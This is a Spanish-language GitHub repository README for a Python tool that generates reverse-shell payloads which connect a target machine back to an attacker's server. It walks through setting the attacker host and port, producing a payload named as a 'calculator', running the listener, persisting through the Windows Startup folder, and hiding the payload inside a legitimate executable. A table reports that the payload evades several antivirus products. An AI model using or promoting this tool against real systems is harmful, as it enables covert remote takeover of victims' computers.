Skip to content

Proyecto que consiste en generar un payload de reverse shell en python, el cual se ejecuta en la máquina objetivo y se conecta a un servidor controlado por el atacante.

Notifications You must be signed in to change notification settings

epmyas2022/reverse_shell

Repository files navigation

Reverse Shell

Proyecto que consiste en generar un payload de reverse shell en python, el cual se ejecuta en la máquina objetivo y se conecta a un servidor controlado por el atacante.

Requisitos

  • Static Badge

Instalación

Clona el repositorio

git clone https://github.com/epmyas2022/reverse_shell.git

Entra al directorio del proyecto

cd reverse_shell

Instala las dependencias

pip install -r requirements.txt

Uso

python reverse_shell.py

Comandos

  • help: Muestra la lista de comandos disponibles.
  • generate: Genera un payload de reverse shell en python.
  • execute: Inicia un servidor que escucha las conexiones de los payloads generados.
  • autoexe: Genera un exe que creara una copia del payload en la carpeta de inicio de Windows.
  • hiddenexe: Genera un exe que oculta una carga dentro de otra aplicacion.
  • set: Establece el valor de una variable.
  • exit: Salir del programa.

Ejemplos

Generar un payload de reverse shell especificando la dirección IP y el puerto del servidor

El siguiente comando setea la direccion IP del payload:

Payload

set generate.lhost 10.0.0.20

El siguiente comando setea el puerto del payload:

set generate.lport 4444

El siguiente comando genera el payload:

generate

Reverse Shell Generate Command

Los payloads generados se guardan en la carpeta raíz del proyecto. con el siguiente nombre: calculator-{timestamp}

Servidor en escucha

Iniciar el servidor que escucha las conexiones de los payloads generados

El siguiente comando setea el puerto del servidor:

set session.lport 4444

El siguient comando setea el host del servidor:

set session.lhost 10.0.0.20

El siguiente comando inicia el servidor:

execute

Reverse Shell Execute Command

Para detener la escucha del servidor, presiona Ctrl + C

Para salir de la sesión, ejecuta el comando exit

Autoexe

Generar un autoexe creara una copia del payload en la carpeta de inicio de Windows.

Antes que nada, se debe generar un payload.

El siguiente comando setea el nombre del archivo:

set windows.autoexe.path <nombre_del_payload>

El siguiente comando genera el autoexe:

autoexe

Reverse Shell Autoexe Command

Hidden exe in pocketbase

Generar un exe que oculta una carga dentro de otra aplicacion (pocketbase.exe)

Antes que nada, se debe generar un payload.

El siguiente comando setea el directorio de aplicacion:

set windows.hiddenexe.path <ruta_con_lo_que_se_quiere_ocultar>

El siguiente comando indica el nombre de exe oculto a ejecutar:

set windows.hiddenexe.payload <nombre_del_exe_oculto>

El siguiente comando indica el nombre del exe legitimo a ejecutar:

set windows.hiddenexe.app <nombre_del_exe_legitimo>

El siguiente comando genera el hidden exe:

hiddenexe

Reverse Shell Hiddenexe Command

Pruebas realizadas en antivirus

✅ = No detectado ❌ = Detectado

  • Windows Defender [✅]
  • Avast [✅]
  • ESETNOD32 [✅]
  • McAfee [✅]
  • Bitdefender [✅]
  • Bkav Pro [❌]
  • SecureAge [❌]
  • Kaspersky [❌]
  • Skyhigh (SWG) [❌]

Resultados de virustotal.com

Payload

Autoexe

Hidden exe in pocketbase

Capturas

Reverse Shell

About

Proyecto que consiste en generar un payload de reverse shell en python, el cual se ejecuta en la máquina objetivo y se conecta a un servidor controlado por el atacante.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages